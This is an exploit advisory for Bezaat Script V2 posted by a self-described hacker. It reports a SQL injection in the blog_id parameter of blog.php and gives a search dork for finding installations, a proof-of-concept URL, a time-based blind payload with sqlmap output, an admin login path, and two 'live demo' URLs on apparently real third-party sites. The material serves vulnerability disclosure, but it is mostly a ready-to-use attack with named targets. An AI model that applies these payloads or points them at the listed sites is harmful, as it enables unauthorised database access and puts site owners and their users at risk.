######################
# Exploit Title : Bezaat Script V2 SQL Injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : Powed by Greenit Egypt for Information Technology
# Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 15/09/2016
# video Proof : https://youtu.be/psHqU3Ldo5Q
######################
# [★] DESCRIPTION :
######################
# [+] Bezaat Script It's An Commerce Script
# [+] That Allow you To Add and Menage ads in your Website
# [+] AND an SQL Injection has been Detected in his Script Version 2
# [+] The Other Version Maybe Also infected
######################
# [★] Poc :
######################
# When you add ['] to the Vulnerable Parameter you will Notice a Warning With SQL errors
# http://127.0.0.1/blog/blog.php?blog_id=[SQLi]
# [id] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/blog/blog.php?blog_id=1'
######################
# [★] SQLmap PoC:
######################
# Parameter: blog_id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: blog_id=1 AND SLEEP(5)
#---
#[14:19:45] [INFO] GET parameter 'blog_id' appears to be 'MySQL >= 5.0.12 AND time-based blind' #injectable
#[14:19:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
#[14:19:45] [INFO] automatically extending ranges for UNION query injection technique tests as there #is at least one other (potential) technique found
#[14:19:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
#[14:19:59] [INFO] checking if the injection point on GET parameter 'blog_id' is a false positive
#
# GET parameter 'blog_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
######################
# [★] Live Demo :
######################
# http://al3ta.com/blog/blog.php?blog_id=1
# http://192.185.31.144/~greenscr/bezaat/blog/blog.php?blog_id=4
######################
# [★] Admin Dashboard :
######################
# http://127.0.0.1/admin/adminlogin.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################